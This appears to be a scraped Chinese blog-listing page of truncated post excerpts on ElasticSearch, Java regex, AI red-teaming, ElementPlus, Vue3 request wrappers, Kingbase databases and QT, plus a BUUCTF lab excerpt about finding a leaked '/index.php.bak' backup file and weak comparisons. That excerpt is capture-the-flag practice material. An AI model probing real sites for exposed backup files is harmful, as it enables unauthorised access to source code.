专注于大学生项目实战开发,讲解,毕业答疑辅导&#xff0c;欢迎高校老师/同行前辈交流合作✌。 技术范围&#xff1a;SpringBoot、Vue、SSM、HLMT、小程序、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、安卓app、大数据、物联网、机器学习等设计与开发。 主要内容&#xff1a;…...

ElasticSearch 可观测性最佳实践

ElasticSearch 概述 ElasticSearch 是一个开源的高扩展的分布式全文检索引擎&#xff0c;它可以近乎实时的存储、检索数据&#xff1b;本身扩展性很好&#xff0c;可以扩展到上百台服务器&#xff0c;处理 PB 级别&#xff08;大数据时代&#xff09;的数据。ES 也使用 Java 开…...

Java----正则表达式的学习

正则表达式可以检验字符串是否满足一定规则&#xff0c;并用来校验数据格式的合法性。 在一段文本当中查找满足需求的内容&#xff1a; import java.math.BigDecimal; import java.math.BigInteger; import java.util.Random;import static java.lang.Math.abs; import static…...

为何AI系统比以往任何时候都更需要红队测试

AI 系统已深度融入现代生活&#xff0c;但并非无懈可击。红队测试作为一项关键技术&#xff0c;正通过系统性地挖掘 AI 漏洞&#xff0c;显著提升其安全性与可靠性。随着人工智能技术的快速迭代&#xff0c;这种全面测试的需求愈发迫切&#xff0c;不仅能防范潜在危害&#xff…...

ElementPlus 快速入门

目录 前言 为什么要学习 ElementPlus&#xff1f; 正文 步骤 1 创建 一个工程化的vue 项目 ​2 安装 element-Plus :Form 表单 | Element Plus 1 点击 当前界面的指南 2 点击左边菜单栏上的安装&#xff0c;选择包管理器 3 运行该命令 demo(案例1 &#xff09; 步骤 …...

vue3 ts 请求封装后端接口

一 首页-广告区域-小程序 首页-广告区域-小程序 GET/home/banner1.1 请求封装 首页-广告区域 home.ts export const getHomeBannerApi (distributionSite 1) > {return http<BannerItem[]>({method: GET,url: /home/banner,data: {distributionSite,},}) }函数定…...

[ACTF2020 新生赛]BackupFile-3.23BUUCTF练习day5(1)

[ACTF2020 新生赛]BackupFile-3.23BUUCTF练习day5(1) 解题过程 打开题目环境 看题目意思应该是让我找备份文件 备份文件一般的后缀名为 .rar .zip .7z .tar.gz .bak .swp .txt .html .bak 直接扫描一下 在url中输入/index.php.bak 弱类型比较 为弱相等&#xff0c;即当…...

信创-人大金仓数据库创建

一. 官文 资源下载地址 https://download.kingbase.com.cn/xzzx/index.htm 下载安装文件 下载授权文件 产品文档地址&#xff1a;https://help.kingbase.com.cn/v8/index.html 二. 概念 2.1 体系结构 ‌ 实例结构 ‌&#xff1a;由数据库文件和 KingbaseES 实例组成。数据…...

【QT】QTCreator测试程序

使用QTCreator实现窗体&#xff0c;其中拟合程度图左侧是测点列表&#xff0c;右侧是改测点的拟合程度图&#xff08;不使用UI&#xff0c;使用代码编写实现&#xff09; 实现思路 创建主窗口&#xff1a;继承 QMainWindow 类来创建主窗口。布局管理&#xff1a;使用 QSplitt…...